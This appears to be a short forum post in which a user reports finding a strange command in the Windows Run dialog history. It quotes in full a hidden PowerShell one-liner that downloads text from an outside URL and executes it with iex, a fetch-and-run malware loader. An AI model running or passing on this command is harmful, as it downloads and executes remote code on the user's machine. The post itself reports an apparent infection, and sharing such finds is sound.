Found a weird command in Run program
I just got out of bed and accidentally opened the Window + R command this is what I found COMMAND: powershell.exe -W Hidden -command $url = 'https://finalsteptogo.com/uploads/tr14.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text The link leads to this and another link…